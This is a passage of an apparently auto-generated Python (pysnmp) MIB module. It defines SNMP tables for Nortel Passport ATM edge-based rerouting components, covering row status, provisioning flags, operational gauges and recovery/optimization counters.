mscAtmIfVptPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrProvEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrPathOptimization.setStatus('mandatory')
# Operational table: read-only gauges.
mscAtmIfVptPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrOperTable.setStatus('mandatory')
mscAtmIfVptPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrOperEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')
# Statistics table: read-only counters.
mscAtmIfVptPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrStatsTable.setStatus('mandatory')
mscAtmIfVptPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrTotalPathOptimizations.setStatus('mandatory')
# ---------------------------------------------------------------------------
# mscAtmIfVptUniEbr: Ebr component under AtmIf/Vpt/Uni. Same four-table
# layout (RowStatus .1, Prov .20, Oper .30, Stats .40), indexed by
# AtmIf / Vpt / VptUni / VptUniEbr.
# ---------------------------------------------------------------------------
mscAtmIfVptUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7))
# Row-status table.
mscAtmIfVptUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatus.setStatus('mandatory')
mscAtmIfVptUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrComponentName.setStatus('mandatory')
mscAtmIfVptUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrStorageType.setStatus('mandatory')
mscAtmIfVptUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptUniEbrIndex.setStatus('mandatory')
# Provisioning table: 1-octet flag fields, default 0xc0.
mscAtmIfVptUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrProvTable.setStatus('mandatory')
mscAtmIfVptUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrProvEntry.setStatus('mandatory')
mscAtmIfVptUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrPathOptimization.setStatus('mandatory')
# Operational table: read-only gauges.
mscAtmIfVptUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrOperTable.setStatus('mandatory')
mscAtmIfVptUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrOperEntry.setStatus('mandatory')
mscAtmIfVptUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
# Statistics table: read-only counters.
mscAtmIfVptUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrStatsTable.setStatus('mandatory')
mscAtmIfVptUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrTotalPathOptimizations.setStatus('mandatory')
# ---------------------------------------------------------------------------
# mscAtmIfVptVccSrcEbrOv: per-connection Ebr override component under
# AtmIf/Vpt/Vcc/Src. Two tables only: RowStatus (.1) and Prov (.20); the
# provisionable attributes are yes/no enums (INTEGER {no(0), yes(1)},
# default 'yes') overriding recovery/optimization subscription.
# ---------------------------------------------------------------------------
mscAtmIfVptVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2))
# Row-status table: indexed down to the Vcc source plus the EbrOv index.
mscAtmIfVptVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1), )
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVptVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvIndex.setStatus('mandatory')
# Provisioning table: read-write yes/no subscription overrides, default 'yes'.
mscAtmIfVptVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20), )
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVptVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
# ---------------------------------------------------------------------------
# mscAtmIfVptVccEbrInfo: read-only per-Vcc Ebr status component under
# AtmIf/Vpt/Vcc. Three tables: RowStatus (.1, rowStatus is read-only here,
# unlike the provisionable components), Oper (.30, yes/no status enums) and
# Stats (.40, counters).
# ---------------------------------------------------------------------------
mscAtmIfVptVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12))
# Row-status table (read-only rowStatus: component is system-created).
mscAtmIfVptVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1), )
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVptVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVptVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoIndex.setStatus('mandatory')
# Operational table: yes/no status of subscription and recovery state.
mscAtmIfVptVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30), )
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoConnectionRecovered.setStatus('mandatory')
# Statistics table: read-only counters.
mscAtmIfVptVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40), )
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
# ---------------------------------------------------------------------------
# mscAtmIfPnniEbr: Ebr component under AtmIf/Pnni. Same four-table layout
# (RowStatus .1, Prov .20, Oper .30, Stats .40), indexed by
# AtmIf / Pnni / PnniEbr.
# ---------------------------------------------------------------------------
mscAtmIfPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7))
# Row-status table.
mscAtmIfPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatus.setStatus('mandatory')
mscAtmIfPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrComponentName.setStatus('mandatory')
mscAtmIfPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrStorageType.setStatus('mandatory')
mscAtmIfPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfPnniEbrIndex.setStatus('mandatory')
# Provisioning table: 1-octet flag fields, default 0xc0.
mscAtmIfPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrProvTable.setStatus('mandatory')
mscAtmIfPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfPnniEbrProvEntry.setStatus('mandatory')
mscAtmIfPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfPnniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfPnniEbrPathOptimization.setStatus('mandatory')
# Operational table: read-only gauges.
mscAtmIfPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrOperTable.setStatus('mandatory')
mscAtmIfPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfPnniEbrOperEntry.setStatus('mandatory')
mscAtmIfPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')
# Statistics table: read-only counters.
mscAtmIfPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrStatsTable.setStatus('mandatory')
